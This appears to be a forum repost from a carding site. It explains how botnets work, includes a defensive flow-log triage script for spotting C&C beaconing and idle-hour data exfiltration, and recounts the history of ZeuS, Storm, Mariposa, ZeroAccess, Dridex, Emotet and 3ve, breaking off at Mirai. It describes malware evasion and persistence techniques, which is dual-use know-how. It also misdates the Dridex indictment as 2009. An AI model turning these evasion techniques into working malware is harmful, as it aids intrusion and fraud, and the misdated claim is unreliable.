Botnet

Carding

Professional
A botnet is a computer network of devices infected with malware. The term is made up of parts of the English words "robot" and "network".

In this context, a bot is usually a device (computer, smartphone) controlled by a hidden program that receives commands from its owner via the Internet. Botnets are used for DDoS attacks, brute-force password guessing, mining bitcoins or other cryptocurrencies, and spreading spam. IoT devices can also be bots: for example, the well-known Mirai botnet consists of them.


Because an infected device executes any instructions from the attacker, it is often called a zombie machine, and a botnet, accordingly, is called a zombie network. Malicious programs can get in if the user is not vigilant: cybercriminals disguise them as useful software. A bot agent can also install itself through a vulnerability in any software, or by brute-forcing the passwords of shared network resources. In rare cases, it is installed while there is open access to the computer.

Malicious programs for organizing botnets run independently on the device and are protected from deletion. The protection mechanism consists of unconventional startup methods, replacement of system files, and rebooting the machine when the autostart keys are accessed. Agents mimic system processes and can use two processes that restart each other.

A botnet has huge computing resources and brings tangible profits to cybercriminals. An attacker can anonymously control infected computer devices from anywhere in the world.

Botnet classification

Botnets are classified by architecture and network protocol.

From an architectural point of view, botnets with a control center can be distinguished from decentralized ones. In the first case, all computers are united around one control center (Command & Control Center, C&C). This is the most common variety. The center waits for responses from bots, records them, and distributes instructions determined by the owner. Sometimes an attacker creates several centers in case they are disabled or blocked. Zombie networks of this type are easy to create and manage and react more quickly to commands, but they are also somewhat easier to fight than other types of botnets: it is enough to destroy the command center and the network collapses. However, the task may become more complicated due to the migration of centers or traffic encryption.

Decentralized malicious networks are also called P2P botnets, from the English term "peer-to-peer", meaning a point-to-point connection. In such systems, bot agents do not connect to a control center but to a certain number of other infected computers. Having received a command, the malware passes it on to the next machine, and this is how instructions propagate throughout the zombie network. Thus, a cybercriminal can control all infected computers through any node of the botnet. A network of this type is less convenient to operate, but due to the lack of a center, it is also more difficult to deal with.

The classification of zombie networks by protocols is explained by the interaction between the machine issuing the command and the computers of the victims. It is built on network protocols that determine the order of communication between nodes. On this basis, botnets are divided into four groups.

The first group includes IRC-oriented zombie networks. They are characterized by each infected device connecting to an IRC server, joining the specified channel and waiting for the owner's command. The second group is made up of networks using IM channels. The need to create a separate account for each node reduces the popularity of such botnets. The third group is web-oriented botnets, where computers are controlled through the World Wide Web. They are easy to develop, there are many web servers on the Internet, and they are very easy to manage; for these reasons, such malicious networks are in demand. The fourth group includes other types of systems with their own, non-standard protocols.

Object of influence

The objects of influence of botnets are government agencies, commercial companies, and ordinary Internet users. Cybercriminals use bots to achieve goals of different kinds and scales. For example, the simplest, most popular and most profitable use of botnets is spamming. The owner of the zombie network does not always do this himself: often spammers rent a botnet.

Botnets are also used to carry out DDoS attacks. The attacked server cannot cope with the stream of requests from infected computers and stops, and users cannot access it. In order to restore the operation of the web resource, the attackers demand a ransom. Cyber blackmail of this kind is very common, since today all companies actively use the Internet to conduct business, and some organizations work only through the World Wide Web. Owners or tenants of botnets can also use DDoS attacks for political actions or provocations. Government, state, military and other organizations become targets of bot attacks.

Botnets are used to mine bitcoins. Penetrating into the user's computer, the bot-agent uses the machine's resources for its own purposes. The more infected devices, the more currency the attacker "mints". GPU power can be used while the computer is idle, so the presence of malicious activity is not immediately noticed.

Botnets are also used for anonymous access to the Internet in order to hack websites or transfer money. They are also actively used to steal classified information. The advantage of a zombie network over other malicious agents is the ability to collect information from a huge number of computers at the same time. This information is often sold or exploited to expand the botnet.

Source of threat

Bot agents are created by cybercriminals, for example, in order to steal. Typically, hackers steal access data for a particular system in order to obtain monetary gain or some other personal benefit. Zombie networks are also used by representatives of illegal businesses to promote their goods and services.

The most dangerous group of developers of such programs are organized cybercriminals who use infected networks for attacks, stealing data and money, sending advertisements, blackmail, provocations, etc. In addition, they form botnets for sale and rent.

Risk analysis

Statistics show that a huge number of various computer devices are part of botnets. The consequences of infecting a computer with a bot agent may vary depending on the botnet owner and the goals he pursues. The most notable activities of the zombie network are DDoS attacks. The danger of infected networks is also growing because their creation becomes easier every year, new ways of introducing malicious programs are found, which means that new botnets appear and the existing ones expand.

In early March 2017, researchers discovered a vulnerability in the security system of DVRs and surveillance cameras from the Chinese company Dahua. This meant that the devices could easily end up executing attackers' commands. Read more about this in the article "Chinese cameras and DVRs can become part of botnets."

Despite the scary statistics, you can protect your computer. This requires:
  • use effective anti-virus protection,
  • timely update the operating system and all applications,
  • use an encryption program when transferring personal data,
  • observe general reasonable precautions when using the Internet.

It is also helpful to monitor device activity. If it is working hard during idle time or is transferring too much data, then it is possible that there is a malicious agent on it.
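An added example (not from the original post) of the monitoring the post recommends, written from the defender's side: it runs over constructed flow-log lines and flags a host that keeps re-contacting one control center at a steady interval (the centralized C&C and IRC-channel pattern described above) or that pushes an unusual amount of data out during idle hours. The hosts, addresses, ports, idle window and thresholds are assumptions made for the example.

```python
"""Flow-log triage for botnet-style behaviour (added example, constructed data).
Checks: (1) regular beaconing to one centre, incl. IRC ports; (2) heavy egress
while the host should be idle. Addresses, ports and thresholds are assumptions."""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

IRC_PORTS = {6667, 6697}          # classic IRC ports used by IRC-oriented botnets
BEACON_MIN_FLOWS = 4              # samples needed before judging regularity
BEACON_MAX_CV = 0.15              # coefficient of variation below this = periodic
IDLE_HOURS = range(0, 6)          # hours when this (assumed) office host is idle
IDLE_EGRESS_LIMIT = 50_000_000    # bytes out during idle hours that we tolerate

# Constructed flow records (not real traffic): "timestamp src dst:dport bytes_out"
SAMPLE_FLOWS = """\
2024-01-01T02:00:00 10.0.0.5 203.0.113.10:6667 120
2024-01-01T02:05:01 10.0.0.5 203.0.113.10:6667 118
2024-01-01T02:10:00 10.0.0.5 203.0.113.10:6667 122
2024-01-01T02:15:02 10.0.0.5 203.0.113.10:6667 119
2024-01-01T02:20:00 10.0.0.5 203.0.113.10:6667 121
2024-01-01T02:03:10 10.0.0.7 198.51.100.20:443 8300
2024-01-01T02:27:45 10.0.0.7 198.51.100.20:443 15000
2024-01-01T02:31:05 10.0.0.7 198.51.100.20:443 2200
2024-01-01T02:58:30 10.0.0.7 198.51.100.20:443 9100
2024-01-01T02:59:00 10.0.0.7 198.51.100.21:443 4000
2024-01-01T03:10:00 10.0.0.9 192.0.2.30:443 30000000
2024-01-01T03:40:00 10.0.0.9 192.0.2.30:443 25000000
"""


def parse_flows(text):
    """Parse the simple space-separated flow format into dicts."""
    flows = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, src, dst_port, nbytes = line.split()
        dst, port = dst_port.rsplit(":", 1)
        flows.append({"ts": datetime.fromisoformat(ts), "src": src,
                      "dst": dst, "dport": int(port), "bytes": int(nbytes)})
    return flows


def beacon_score(timestamps):
    """Return (average gap in seconds, coefficient of variation of the gaps).
    A CV near 0 means the contacts are periodic, i.e. a heartbeat to a centre.
    Fewer than three timestamps give no usable statistics, so return (inf, inf)."""
    ts = sorted(timestamps)
    if len(ts) < 3:
        return float("inf"), float("inf")
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    avg = mean(gaps)
    if avg <= 0:
        return 0.0, float("inf")
    return avg, pstdev(gaps) / avg


def find_suspects(flows):
    """Return findings as {"host", "kind", "detail"} dicts, one per pattern hit."""
    findings = []
    by_channel = defaultdict(list)   # (src, dst, dport) -> contact timestamps
    idle_egress = defaultdict(int)   # src -> bytes sent out during idle hours
    for f in flows:
        by_channel[(f["src"], f["dst"], f["dport"])].append(f["ts"])
        if f["ts"].hour in IDLE_HOURS:
            idle_egress[f["src"]] += f["bytes"]
    for (src, dst, dport), stamps in by_channel.items():
        if dport in IRC_PORTS:   # waiting on an IRC channel is the classic C&C
            findings.append({"host": src, "kind": "irc-c2-port",
                             "detail": f"{dst}:{dport}"})
        if len(stamps) >= BEACON_MIN_FLOWS:
            avg, cv = beacon_score(stamps)
            if cv <= BEACON_MAX_CV:
                findings.append({"host": src, "kind": "beaconing",
                                 "detail": f"{dst}:{dport} every ~{avg:.0f}s (cv={cv:.3f})"})
    for src, total in idle_egress.items():
        if total > IDLE_EGRESS_LIMIT:   # "transferring too much data" while idle
            findings.append({"host": src, "kind": "idle-egress",
                             "detail": f"{total} bytes out during idle hours"})
    return findings


if __name__ == "__main__":
    for finding in find_suspects(parse_flows(SAMPLE_FLOWS)):
        print(f"{finding['host']:<10} {finding['kind']:<13} {finding['detail']}")
```

A hit is a triage lead, not proof of infection: a backup agent or monitoring client also beacons regularly, so the flagged host and destination still need to be checked against what is known to run there.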
 

Carding 4 Carders

Professional

The most dangerous botnets

A botnet won't surprise anyone today: they appear all the time, and the underlying infection is easily cleaned out by antivirus software, thanks to the crookedness of authors who cobble malware together on their knees from muck and sticks. But it happens that pros take on virus writing, and then the damage becomes colossal, and the war against the malware is protracted and interesting. In this article, I will analyze such stories, and some of them are not over yet.

It is impossible to cover even all of the most interesting epidemics in one article, so I selected only eight of the most significant cases. And even they can't be described in full detail, so I warn you right away that some details may be omitted - intentionally or not. Keep in mind that the situation around active Trojans may well change from the moment the article is published.

ZeuS
  • Brief description: banking Trojan
  • Years of life: 2007-present
  • Number of infections: more than 13 million
  • Distribution method: exploit pack
  • Distribution: 196 countries
  • Damage: more than $120 million
Our hit parade opens with Zeus, but not the one who sits on Olympus among the gods. This banking Trojan is so widespread that it took first place in the list of America's most wanted botnets. According to armchair analysts, it was used in 90% of all bank fraud cases in the world.

At first, several hundred separate botnets were created on the basis of ZeuS, controlled by different gangs of cybercriminals. The author or authors of the bot simply sold the builder to all and sundry, and they made their own botnets out of it.

Everyone distributed the bot as best they could: for example, in 2009, one of the groups conducted a large-scale mailing of Zeus through the Pushdo spam botnet. Damballa estimates that about 3.6 million PCs were infected in the United States alone. In total, more than 13 million computers have been infected since the introduction of Zeus.

The Zeus developer was originally known under the nicknames Slavik and Monstr, and it was he who independently sold and supported the bot in 2007-2010. This continued until version 2.0, when in October 2010 Slavik transferred the source code of version 2.0 to the developer of the SpyEye Trojan and, according to legend, stopped development. But, according to RSA, the original author did not go anywhere, and the transfer of the code was a red herring.

In August 2010, that is, two months before the official announcement of the termination of work on Zeus, experts discovered a botnet built on Zeus version 2.1, which was not being sold on any underground forum at that time. From this, we can conclude that the author simply changed his business model and decided to create his own botnet rather than sell the bot builder to everyone.

One of the main features of Zeus 2.1 was a changed scheme of communication with the control servers: server addresses were now generated using a DGA (Domain Generation Algorithm). To protect against interception, the signature of the file downloaded during an update was checked (an RSA-1024 signature was used).

Among the innovations of this version, some researchers also include the appearance in September of the ZeuS-in-the-Mobile (ZitMo) build for Android, Windows Mobile, BlackBerry and even Symbian. The newly-minted Trojan worked in conjunction with the "regular" desktop version of Zeus and made it possible to bypass two-factor authentication in online banking. According to Check Point Software and Versafe, by the end of 2012, the ZitMo build called Eurograbber had brought its owners a profit of about 36 million euros (about $47 million at that time).

Someone either got greedy or leaked the source code of Zeus 2.0.8.9 on the side, but the fact remains that the source code of the almost current version of Zeus went on sale on the darknet; this was February 2011. And then either there were no buyers, or the seller was hacked — in May, the source code got into the public. This event was, I think, the most significant one for the hacker world in 2011.

We should also mention the HVNC module (H stands for Hidden). This is an implementation of a VNC server, but it interacts with a virtual desktop that the user cannot see. Later, based on the merged sources, the HVNC module was converted into a separate project.

After the leak, "craftsmen" immediately appeared who began riveting their own Trojans out of the Zeus source code, and these were sometimes clones of Zeus in more or less their entirety, including the admin panel. But there were also more worthwhile creations — for example, the Citadel project. Its main feature was the creation of an online platform similar to the modern GitHub. Here, customers could request new features, report bugs, and add their own modules. In short, the development became interactive and brought a lot of money to its admins. Customers were even provided with technical support — it included, for example, constantly keeping Citadel up to date to bypass the latest protection from antivirus programs.

In the fall of 2011, a researcher named Roman Hussy, who was studying Zeus, noticed strange UDP traffic while researching one of the Zeus variants. Further analysis showed that the new version of Zeus had several IP addresses in its configuration block, and the computers at these IP addresses responded to the infected system. Over the course of a day, approximately 100 thousand unique IP addresses contacted by the new modification were identified; most of them were located in India, Italy and the United States.

It turned out that Zeus had acquired peer-to-peer functions designed for updating and based on the Kademlia protocol. Because of the use of a script named gameover.php, this version was given the name GameOver.

In early 2012, another version of Zeus GameOver was discovered: it contained a built-in nginx server to interact with other bots via the HTTP protocol. From this point on, each bot could act as a proxy for communicating with the original C&C, and protection from the distribution of "updates" by specialists on the other side of the barricades was provided by the same file signature. The GameOver version turned out to be very tenacious and is still active.

More than 74,000 hacked FTP servers, spam, fraud with fake technical support, exploits, and even social engineering in social networks were used to spread the bot. In short, the whole gentleman's set.

Later, it was reported that the FBI, together with experts from about a dozen countries, had identified the group behind the creation of Zeus. All its participants were put on the wanted list, including the alleged organizer, a certain Evgeny Bogachev. According to the FBI, Bogachev lives in Anapa and owns a yacht. A record reward of 3 million green American rubles is offered for his head! Since then, little has been heard about Zeus updates: the author, apparently, has laid low, and there is no progress in the search at all. We will wait for news.

By saying "little has been heard about updates", I mean that the original Zeus was actually no longer supported, but in 2015 a new and interesting modification of it appeared, called Sphinx. Its panel is not particularly different, but inside it is a new Trojan, thoroughly reworked by unknown authors. Now, in connection with the coronavirus, it is especially active and is spread through social engineering. A fake Kaspersky Lab signature and a self-made certificate were used as a cover.

Treatment of Zeus is very difficult: it successfully bypasses antivirus programs using polymorphic encryption, infects many files, and is constantly updated. The best remedy is to reinstall the infected system, but if you really want to, you can try to find and cure the infected files, of course, without any guarantees of success.

Storm
  • Brief description: email worm for spam and DDoS
  • Years of life: 2007–2008
  • Number of infections: about 2 million
  • Distribution method: spam
Storm (aka Zhelatin) was first spotted in early 2007 and was sent out under the guise of reports of destruction caused by severe storms in Europe. From the very beginning, the bot used social engineering in emails, and even such "news" as the resurrection of Saddam Hussein was used as bait in the subject line. But if social engineering were the only feature of the Storm botnet, it would not have been included in our selection. For its time, Storm was probably the most technologically advanced malware. It implemented a decentralized p2p management system based on the Overnet protocol (built on the eDonkey network) and server-side polymorphism.

Server polymorphism was previously used only in the Stration botnet, which first appeared in 2006. Subsequently, there was a short and not particularly interesting war for users' computers between this botnet and Storm. However, at one point Storm accounted for up to 8% of all malware on Windows computers.

In July 2007, at the peak of its growth, the botnet generated about 20% of all spam on the Internet, sending it from 1.4 million computers. It was engaged in promoting medicines and other drugs: both relatively legal ones, like Viagra, and prohibited ones.

Around the same time, attempts were made to break the botnet into several separate subnets. Perhaps the authors wanted to sell access to infected machines in parts to interested parties. Either way, it didn't work out.

The botnet was quite brutal in protecting its resources from too curious researchers. When frequent requests were detected from the same address to download bot updates, which is what antivirus companies like to do, the bots launched a DDoS attack on this address. In addition, the websites of companies that prevented the botnet owners from doing their dirty work were attacked with varying success. So, as a result of DDoS attacks, the Spamhaus, SURBL (Spam URI Realtime Blocklists) and URIBL (Realtime URI Blacklist) services were disrupted for a short time. This was necessary to prevent anti-spam solutions from updating databases and blocking mailings.

At some point, the total performance of PCs infected with Storm surpassed the supercomputers of the time. Imagine what power the owners of Storm had in their hands! If only they had decided to do parallel computing instead of sending spam… However, let's not talk about sad things. The cryptocurrencies that you were thinking about mining, of course, had not yet been born out of Satoshi Nakamoto's ideas, so there was nothing to mine. It's a pity. In the role of a malicious miner, the botnet would look much more interesting in our selection.

So it would have continued, but at the end of 2008, the botnet disappeared as if by magic. Kaspersky Lab believes that this happened due to the closure of the Russian Business Network, a criminal bulletproof hosting service from Russia. According to another version, which seems more realistic to me, Storm was destroyed by security researchers. At the Chaos Communication Congress conference (December 2008), a group of hackers showed the tool Stormfucker, which, using a bug in Storm, independently spread through the Overnet network and cured infected computers. And Microsoft, as usual, interpreted what was happening in its own way: they believe that a Windows update helped get rid of the botnet. The experts never agreed on a single version.

Of course, a place in the sun is usually not empty, and with the demise of Storm, a new botnet from the Waledac Trojan appeared. Although the code was completely different from its predecessor, Waledac suspiciously resembled Storm in some features: the use of Fast Flux C&C hosting, server polymorphism, spam distribution functions and a p2p update mechanism. Even the spam email templates were almost identical to those from Storm. Waledac advertised the same products from the same sellers as Storm. A visual demonstration of how one botnet is covered up and replaced immediately by a new one.

Storm seemed like a ghost until 2010, when members of the Honeynet Project discovered a new version of it. It consisted of approximately two-thirds of the code of the first version: 236 of the worm's 310 functions remained unchanged. The piece responsible for peering went into the trash (it seems that this was due to Stormfucker), and the communication protocol with C&C was changed to HTTP (previously, plain TCP sockets were used). Fortunately, Storm 2.0 was not as widely adopted as its older brother, which may have been due to the transfer of the first version's source code to another development team.

It was relatively easy to notice the symptoms of infection if you monitored attempts to start processes. Malicious processes were usually named gameX.exe, where X is a number. The following options are possible:

  • game0.exe - backdoor and loader in one package; this process started the rest;
  • game1.exe - SMTP server for sending spam;
  • game2.exe - email address stealer;
  • game3.exe - spam distribution module;
  • game4.exe - DDoS utility;
  • game5.exe - bot update process.
The code was run by the rootkit from %windir%\system32\wincom32.sys, which allowed it to bypass some security mechanisms. Although rootkit code in the kernel doesn't care about any protection, because getting something out of the kernel, even knowing its internal structure, is not as trivial as it seems.

Also, the rootkit did not hesitate to fake antivirus programs so that the user would think that the protection was working normally, even though it did not work at all.

Thus, Storm became one of the first commercial ready-to-use spam tools. It may not have lasted long, but it showed the way to other attackers who began to act in a similar way.

Mariposa
  • Brief description: Trojan worm
  • Years of life: 2009–2011
  • Number of infections: 12 + 11 million (two waves)
  • Distribution methods: pirated software, self-distribution via flash drives, peer-to-peer networks, and MSN messenger
  • Distribution: 190 countries
The Mariposa botnet ("butterfly" in Spanish) appeared in 2009 and was based on the code of the Palevo Trojan, also known as Rimecud. Panda Labs estimated the size of this giant butterfly at 12 million computers.

In the code, the bot was called somewhat more simply - Butterfly Bot, but no one forbids anyone to name things as they please, so antivirus companies came up with their own name and issued it as an official one. The author had to accept it.

The bot could work as a loader for other malware of all stripes, could get passwords from Firefox and IE out of the box, and set up HTTP and SOCKS proxies to cover the attacker's tracks. And of course, DDoS, with two modules at once: TCP SYN flood and UDP flood.

One of the distribution methods was USB flash drives and autorun.inf, which still worked at the time. However, the bot went about this in a very convoluted way (it is not for nothing that it is based on Palevo): Mariposa created a highly obfuscated autorun file, in which instructions were mixed with a large number of characters in different encodings. So the inf file looked different every time.

The main activity of Mariposa was scams and the already traditional DDoS. This included the theft of victims' accounts from their computers and their subsequent resale. Bank accounts were then used to pay for services, and social networks were used for any kind of scam. Spoiler alert: the purpose of stolen data today is exactly the same.

In terms of protection from analysis, the bot authors tried their best: they enabled a lot of security features, which, however, still did not help avoid the shutdown of the botnet. The security mechanisms included frequent updates and modifications of the binary code that allowed it to bypass signature analysis, countermeasures against running on virtual machines and in sandboxes, and a new secure UDP-based protocol for interacting with the command center.

Unfortunately for the botnet authors (the DDP Team group from Spain directly stated its involvement), in December 2009 Mariposa's career was over. Researchers and the police managed to identify, seize and disable the C&C servers, also in Spain. Three months later (in February), Spanish law enforcement officers arrested three members of the DDP Team. An interesting detail — none of those arrested knew how to program.

According to the Spanish police, the bot herders were completely childish: they connected as admins to the C&C from their home IPs, instead of using a VPN or proxy. However, it was not possible to hold the perpetrators to account, largely because running a botnet at that time was not considered a crime in Spain at all, and for a criminal case, the police would have had to prove that they stole information and then used it for profit. According to official information, the private data of more than 800 thousand people in 190 countries was stolen with the help of Mariposa — however, it was not possible to use this in the investigation for lack of solid evidence.

As a result, the investigation reached a dead end, and the administrators of Mariposa, who were released a couple of months later, visited the office of Panda Security, which had a significant hand in their capture, and began asking to be hired: according to them, they were completely out of money after the Mariposa infrastructure was destroyed. They left, of course, with nothing.

Despite the destruction of C&C Mariposa, since the end of 2010, the number of its detections began to grow again, and six months later another botnet based on the same Palevo, numbering about 11 million machines, was found. They called it Metulji ("butterfly" in Slovenian).

Just a month and a half to two months after the botnet was discovered, its operators, residents of Serbian Bosnia, were identified. The guys also didn't bother and spent money right and left. They were arrested jointly by the Slovenian police, the FBI and Interpol. Since then, Palevo and its derivatives have disappeared from the list of top threats.

As you can see, even script kiddies with minimal knowledge can build botnets of considerable size, even without using spam and exploit packs. Twelve million dollars out of the blue is a serious result.

ZeroAccess
  • Brief description: Trojan Downloader, spammer, and miner
  • Years of life: 2009–2013
  • Number of infections: 9 million
  • Distribution method: exploit pack
The history of ZeroAccess in the rootkit chronicle began in June 2009. At that time, there was an interesting sample with the string F:\VC5\release\ZeroAccess.pdb in the rootkit driver. So the name ZeroAccess is the author's own. There were others, of course: ZeroAccess is also known as Smiscer and Sirefef.

An interesting feature of ZeroAccess is "live bait fishing" for fending off antivirus programs. In addition to its main driver, the rootkit, the bot had an additional kernel driver for creating a decoy, an object that antivirus programs and other supposedly protective mechanisms pecked at. This driver created the device \Device\svchost.exe and stored a dummy binary at the address \Device\svchost.exe\svchost.exe. Access to this pseudo-file was monitored by the rootkit. If something took the bait, ZeroAccess killed the process by injecting code into it that called ExitProcess(). And to prevent subsequent launches of the program that got caught, ZeroAccess reset the ACL on its executable file to prohibit reading and execution. Thus, once caught, the antivirus could no longer start.

In January 2010, the creators of ZeroAccess rolled out an update that enriched ZeroAccess with new features. For this purpose (surprise!), the resources of the Russian Business Network were used. In this version, an obvious borrowing of the ideas of the older TDL-3 rootkit became more noticeable: the launch was now performed through driver infection, and hidden storage in a separate hard disk partition was used to store rootkit components.

Until April 2011, 64-bit versions of Windows were relatively safe and did not get infected with ZeroAccess. However, in May, with the next update, this annoying omission was corrected, though not very technologically. The fact is that in the 32-bit version the rootkit worked at the kernel level, while in the 64-bit environment everything worked in user space. Apparently, the authors decided not to bother with bypassing driver signature verification and made such a crutch.

To increase survivability, they added TCP-based P2P for distributing their modules, as well as a list of initial peers, which contained 256 supernode IP addresses. Antivirus analysts note that this version began to load two types of payload: for click fraud and for mining.

As time went on, more and more people switched to 64-bit operating systems, which make it difficult to develop a kernel-mode rootkit. In May 2012, the kernel driver was dropped, and now all work took place in user mode. The algorithm of the peer-to-peer network also changed slightly, and the length of the RSA key was doubled, from 512 to 1024 bits. Previously, peer-to-peer connections went only over TCP, but now the list of IP addresses was requested over UDP, and the list of modules over TCP. As before, there was still a division according to the type of payload: there was a click fraud or a mining module to choose from.

The ZeroAccess example illustrates the principle of Occam's razor: don't multiply entities unnecessarily, or, put simply, don't overcomplicate things. ZeroAccess started out as a technological development, then the rootkit fell away in the course of evolution, but the botnet continued to live and even got such a fashionable feature as P2P.

Sophos estimates that the number of computers infected by the bot at the end of summer 2012 was more than 9 million, and active infections — about a million. According to experts, the ZeroAccess botnet was the most active in 2012.

Antivirus companies, of course, did not ignore the existence of the botnet and actively looked for ways to intrude through the ZeroAccess peer-to-peer protocol in order to disable it. In March 2013, engineers from Symantec took up the task and successfully discovered a vulnerability in the botnet protocol, which allowed them, although with great difficulty, to disrupt its work.

At the same time, monitoring of botnet activity continued, and on June 29, Symantec specialists noticed that a new version of ZeroAccess was being distributed through the peer-to-peer network. The updated version contained certain changes that closed the vulnerability found earlier. This, it seems, prompted the operation to capture the botnet, which started on July 16. The researchers tried to have time to take control before the update arrived on all nodes. As a result, more than half a million bots left the botnet.

But even greater success was achieved by whitehats from Microsoft: in December 2013, together with the law enforcement agencies of different countries, they disrupted the work of ZeroAccess, taking control of C&C. Law enforcement officers received search and seizure orders for servers that responded to 18 IP addresses and from which the botnet was managed. After this operation, the bots received the latest update from the authors with the WHITE FLAG message. In short, the botnet gave up.

Technically, the botnet is still alive, but it will never receive updates again, as the command servers have sunk into oblivion. The bot is not updated, the detection rate is constantly growing, and more and more antivirus programs disable it. But we can't rule out that the developers are currently working on a new version of ZeroAccess.

Dridex
  • Brief description: banking Trojan
  • Years of life: 2011-present
  • Number of infections: unknown
  • Distribution methods: spam, social engineering, free software
The Dridex banking Trojan is one of the major financial cyberthreats since Zeus left office. In 2015, its damage was estimated at more than $40 million.

Dridex (then Cridex) first appeared around September 2011. Even then, the bot knew how to use web injections to steal money on the Internet, and could also infect USB drives. Therefore, it was initially classified not as a Trojan but as a worm. The web injections turned out to be suspiciously similar in style to Zeus - this could have been facilitated by the leak of the latter's source code in 2011. Later, in 2012, the attackers abandoned USB infection.

The similarity between the Zeus and Dridex web injections is not the only thing that unites them. Specifically, with the Gameover Zeus version, the mechanisms for working with regular expressions, the distribution method (email spam), some aspects of the installer (the main body of the virus and the loader), as well as the set of available components on the infected system were common. Their list includes a SOCKS proxy and a hidden VNC, obviously borrowed from Zeus.

By the beginning of 2015, Dridex even had some semblance of a peer-to-peer network, which again resembles Gameover Zeus. It cannot be called genuine P2P, because not all network nodes were equal. Instead, there were supernodes whose addresses were specified in the Trojan's configuration file, in the XML section <nodes>. Encryption of the communication protocol with the command center also appeared.

The network grew rapidly and the criminals seemed elusive, but on August 28, 2015, one of the Dridex administrators was found and arrested. Some of the bots (they were divided into subnets) disappeared from the network, but after a short time they not only returned, but also brought new ones. It seems that other admins took control of the arrested colleague's subnets and continued working without him.

After the arrest, security measures were immediately tightened: IP-based filtering by geographical location was introduced. If the country was not included in the list, the bot received an error message. This, of course, did not prevent the Trojan from being studied. A couple of months later, the network owners rolled out an update to the Trojan loader, in which the XML config was replaced with a binary one. In fact, this solution was already used in early versions of the then Cridex, so this move was intended to confuse researchers rather than make the Trojan more convenient.

Another interesting version was found in early 2017. In terms of its capabilities, it was similar to the third version, but the analysis of new samples is now greatly complicated by the fact that the loader works for a maximum of a couple of days. Again, the solution is not new: it was about the same with the Lurk Trojan, only there the loader worked for only a few hours. When the loader's lifetime ends, the encryption keys are changed and the old samples become useless. All legacy instances receive a 404 error from the server.

The encryption remains the same as in its ancestor: RC4 with a static key in the Trojan's body. Encryption was needed to protect against detection in traffic, not to block research, since RC4 is a symmetric algorithm that can easily be broken by brute force, but traffic analysis systems are powerless in front of such a pseudo-random data stream.

Most of the victims are located in Europe. Most of the infections were recorded in the UK, followed by Germany and France. Dridex does not infect Russian computers: command servers do not respond to requests from Russian IP addresses.

Over the years of Dridex's existence, whitehats and law enforcement agencies from different countries have repeatedly tried, unsuccessfully, to stop the botnet's activity. In 2009, the US Department of Justice filed charges against two Russians who, according to it, are behind the development of the Dridex malware and not only that.

The indictment says that 32-year-old Maxim Yakubets and 38-year-old Igor Turashev were the developers of the famous banking Trojan Dridex and Yakubets was the leader of the group. In addition, Yakubets is also accused of developing and distributing Zeus.

But so far, Dridex is only adding more and more User Account Control (UAC) bypass techniques that help it stay afloat and continue to infect Windows machines. The damage is difficult to name, but even by the most sparing estimates, it is measured in hundreds of millions of dollars.

Emotet
  • Brief description: banker, loader
  • Years of life: 2014-present
  • Number of infections: unknown
  • Distribution methods: spam, social engineering
Emotet is another high-tech banking Trojan. The first versions stole the bank data of only a few banks, but the botnet was quickly improved and is now also among the top 3 most active and dangerous, although it first appeared relatively recently, in 2014.

Infection actively occurs through spam: emails contain a malicious attachment with a macro. The macro is not just executed, but it uses social engineering methods to force the victim to launch itself, which leads to infection.

At the turn of 2016 and 2017, the creators repurposed the botnet, and now it mainly acts as a loader for other malware of all stripes. However, it should not be removed from the list of bankers yet.

The botnet is sold under the IaaS or MaaS (malware as a service) model to other cybercrime groups. In particular, Emotet often works in tandem with Ryuk.

In the second half of 2019, the number of Emotet infections increased dramatically. The loader suddenly registered a burst of activity. In September, after a short four-month pause, Emotet again began to operate with increasing strength. A total of 27,150 Emotet instances were detected in the second half of 2019 (an increase of 913% compared to last year). During this attack, more than 1000 unique IP addresses were recorded, which hosted C&C Emotet. The graph below shows the number of Emotet samples found for the second half of 2018 and 2019. There is a huge difference.

In 2020, a new feature was discovered: Emotet behaves like a worm, hacking into poorly protected Wi-Fi networks and spreading there. Another demonstration of how attackers invent new techniques in the name of more effective infection.

As for the geographical distribution, Germany, the United States, India and Russia were the most affected. The top affected countries also include China, Italy and Poland. Emotet is still active, so the infection pattern is constantly changing and may even change by the time this article is published.

To date, nothing is known about the creators of Emotet, so there will be no fascinating story of the idiocy of developers and the resourcefulness of law enforcement officers. It's a pity.

3ve
  • Brief description: clickfraud botnet
  • Years of life: 2013–2018
  • Number of infections: ~1.7 million
  • Distribution methods: spam, social engineering
  • Damage: about $30 million
I think you've had enough of the banking Trojans in this collection. This bot, however, belongs to a different family: click-fraud botnets. 3ve ("Eve") does not steal bank data when it infects a machine, but clicks tons of ads on fake sites. Of course, the user does not notice anything, since everything happens secretly. The bot contained many detection bypass mechanisms to bring maximum profit to its creators. 3ve is considered the most advanced click-fraud botnet.

3ve was distributed through the Methbot and Kovter botnets and had several schemes of operation.

One of the schemes was identified as 3ve.1, but it was first discovered by WhiteOps specialists and named MethBot. This campaign was also monitored by experts from Symantec and ESET, under the names Miuref and Boaxxe, respectively. Naturally, no one knew then that this operation was just a small piece of a larger advertising scam.

Another scheme used primarily servers in data centers, rather than computers of ordinary users — bots imitated the behavior of live users of mobile and stationary devices. According to the FBI, 3ve operators used about 1,900 servers in commercial data centers, and they had about 5,000 advertising sites at their disposal.

3ve's operators went further when they began to spoof BGP and allocate blocks of IP addresses belonging to real clients to mask fraudulent activity. When ad networks started blocking addresses associated with the 3ve.1 scheme, the operators simply rented infected machines in the Kovter botnet. The new bots opened hidden browser windows and continued using the old scheme.

In the third scheme, everything remained the same, but instead of a huge number of low-power bots, the campaign involved several powerful servers and a lot of rented proxies to hide servers.

At its peak, the 3ve botnet generated about 3 billion fraudulent requests every day, used about 10,000 fake sites to display ads, had more than a thousand bot servers in data centers, and controlled over a million IP addresses needed to hide bots.

The botnet was closed by a joint effort of Google, the FBI, Adobe, Amazon, ESET, Malwarebytes and other companies. There were eight authors, and thirteen criminal cases were opened against them. Six authors are Russians, and two more are Kazakhs. Sometimes legends about Russian hackers do not lie!

According to Google, after the 3ve infrastructure was blacklisted and sinkholing was used against it, there was a real lull in advertising fraud. Although the men in uniform don't give the group's exact income, experts estimate 3ve's earnings at no less than $30 million.

Mirai
  • Brief description: DDoS botnet
  • Years of life: 2016-present
  • Number of infections: more than 560 thousand
  • Distribution methods: brute force
